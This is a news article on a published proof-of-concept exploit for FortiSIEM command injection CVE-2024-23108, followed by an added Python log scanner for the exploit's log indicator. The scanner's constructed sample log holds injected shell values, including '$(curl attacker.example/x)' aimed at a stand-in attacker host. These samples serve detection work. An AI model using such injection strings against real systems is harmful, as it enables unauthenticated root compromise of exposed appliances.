Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February.
Tracked as CVE-2024-23108, this security flaw is a command injection vulnerability discovered and reported by Horizon3 vulnerability expert Zach Hanley that enables remote command execution as root without requiring authentication.
“Multiple improper neutralization of special elements used in an OS Command vulnerability [CWE-78] in FortiSIEM supervisor may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests,” Fortinet says.
CVE-2024-23108 affects FortiSIEM versions 6.4.0 and higher and was patched by the company on February 8, together with a second RCE vulnerability (CVE-2024-23109) carrying a 10/10 severity score.
After first denying that the two CVEs were real and claiming they were actually duplicates of the same flaw (CVE-2023-34992) fixed in October, Fortinet also said the disclosure of the CVEs was "a system-level error" because they were mistakenly generated due to an API issue.
However, the company eventually confirmed they were both CVE-2023-34992 variants with the same description as the original vulnerability.
On Tuesday, over three months after Fortinet released security updates to patch this security flaw, Horizon3's Attack Team shared a proof-of-concept (PoC) exploit and published a technical deep-dive.
"While the patches for the original PSIRT issue, FG-IR-23-130, attempted to escape user-controlled inputs at this layer by adding the wrapShellToken() utility, there exists a second order command injection when certain parameters to datastore.py are sent," Hanley said.
“Attempts to exploit CVE-2024-23108 will leave a log message containing a failed command with datastore.py nfs test.”
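The indicator Hanley describes (a failed command containing `datastore.py nfs test`) is something a defender can hunt for in appliance logs. The scanner below is an added example and is not code from Horizon3's write-up or from Fortinet; the log lines it runs over are constructed, and the surrounding log layout, the process name and the exact "failed command" wording beyond what the quote gives are assumptions. It flags every occurrence of the indicator, marks those that appear in a failure message, and, as an extra heuristic going beyond the quote, notes whether the trailing arguments carry shell metacharacters that a legitimate NFS test would not.

```python
import re
from dataclasses import dataclass

# Constructed sample log (NOT real FortiSIEM output). The indicator string
# "datastore.py nfs test" is the one Horizon3 names; the timestamp, process
# name and message layout around it are assumptions for illustration only.
SAMPLE_LOG = """\
2024-05-28 10:01:02 phMonitor[1234]: INFO datastore.py nfs test completed for /data/archive
2024-05-28 10:02:15 phMonitor[1234]: ERROR failed command: datastore.py nfs test 10.0.0.5:/export/x;id>/tmp/o
2024-05-28 10:03:44 phMonitor[1234]: INFO heartbeat ok
2024-05-28 10:04:01 phMonitor[1234]: ERROR failed command: datastore.py   nfs   test  $(curl attacker.example/x)
"""

# Match the indicator regardless of spacing/case and capture what follows it.
INDICATOR = re.compile(r"datastore\.py\s+nfs\s+test\b(?P<args>.*)", re.IGNORECASE)

# Characters that let a shell start a second command or substitution. A benign
# NFS target (host:/export/path) needs none of these.
SHELL_META = re.compile(r"[;|&`$(){}<>]")


@dataclass
class Hit:
    line_no: int          # 1-based line in the scanned text
    failed: bool          # message reports a failed command (assumed wording: "fail")
    args: str             # text after "datastore.py nfs test"
    has_shell_meta: bool  # args contain shell metacharacters


def scan(log_text: str) -> list[Hit]:
    """Return every line containing the indicator, with context flags."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = INDICATOR.search(line)
        if not m:
            continue
        args = m.group("args").strip()
        hits.append(Hit(
            line_no=line_no,
            failed="fail" in line.lower(),
            args=args,
            has_shell_meta=bool(SHELL_META.search(args)),
        ))
    return hits


def suspicious(hits: list[Hit]) -> list[Hit]:
    """Keep hits worth triage: a failed command, or metacharacters in the args."""
    return [h for h in hits if h.failed or h.has_shell_meta]


if __name__ == "__main__":
    for h in suspicious(scan(SAMPLE_LOG)):
        print(f"line {h.line_no}: failed={h.failed} meta={h.has_shell_meta} args={h.args!r}")
```

A successful `nfs test` on line 1 is reported as a hit but not as suspicious, so the function separates "the string appeared" from "this looks like an attempt"; on a real appliance, tune the `failed` heuristic to the actual wording of the failure message.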
The PoC exploit released today by Horizon3 can execute commands as root on any Internet-exposed and unpatched FortiSIEM appliance.
Horizon3's Attack Team also released a PoC exploit for a critical flaw in Fortinet's FortiClient Enterprise Management Server (EMS) software, which is now actively exploited in attacks.
Fortinet vulnerabilities are frequently exploited, often as zero-days, in ransomware and cyber espionage attacks targeting corporate and government networks.
For instance, the company revealed in February that Chinese Volt Typhoon hackers used two FortiOS SSL VPN flaws (CVE-2022-42475 and CVE-2023-27997) to deploy the Coathanger remote access trojan (RAT), a malware strain that was also recently used to backdoor a military network of the Dutch Ministry of Defence.